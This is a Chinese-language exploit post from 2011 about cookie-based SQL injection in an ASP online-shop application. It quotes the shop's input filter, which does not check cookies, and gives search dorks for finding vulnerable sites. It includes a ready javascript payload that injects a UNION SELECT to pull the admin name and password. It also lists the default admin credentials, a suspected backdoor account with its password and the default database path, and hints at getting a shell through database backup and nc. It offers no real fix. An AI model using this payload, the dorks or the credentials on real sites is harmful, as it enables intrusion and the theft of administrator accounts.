############################################################################ # # Title: asp网上商城cookies注入漏洞
# Time:2011-09-25
# Team:makebugs
# Author: 晴天小铸 ############################################################################
PS:帮忙踩踩~!
关键字: inurl:sort.asp?sort_id= 或者 inurl:pinpai.asp?pinpai_id=
‘表单数据初步判断,检验攻击语句 Code: Form_Badword=]%20or%20|’|]"|%|update|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe] if request.form<>]" and uBits =]" then Chk_badword=split(Form_Badword,]|]) FOR EACH name IN Request.Form for i=0 to ubound(Chk_badword) If Instr(LCase(request.form(name)),Chk_badword(i))<>0 Then showerr [e] End If NEXT NEXT end if
‘参数初步判断,检验攻击语句 Query_Badword=]%20or%20|’|]"|%|update|=|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe] if request.QueryString<>]" then Chk_badword=split(Query_Badword,]|]) FOR EACH Query_Name IN Request.QueryString for i=0 to ubound(Chk_badword) If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(i))<>0 Then showerr [e] End If NEXT NEXT End if
http://www.2cto.com /sort.asp?sort_id=1
//没检测cookies你懂的
Exp: javascript:alert(document.cookie=]sort_id=]+escape([1 and 1=2 union select 1,admin_name,admin_pass,4,5,6,7 from ad_admin]))
后台数据库可以备份你懂的~!!!!! 需要NC 调用 不懂参考 http://www.2cto.com/Article/201106/92845.html
默认管理账户密码 admin admin888
还有个隐藏账户 swit xuxinyao999 后门?
默认 数据库 地址 Database/shopdata.mdb
修复:老问题了
查看更多关于asp网上商城cookies注入漏洞及修复 - 网站安全 - 自的详细内容...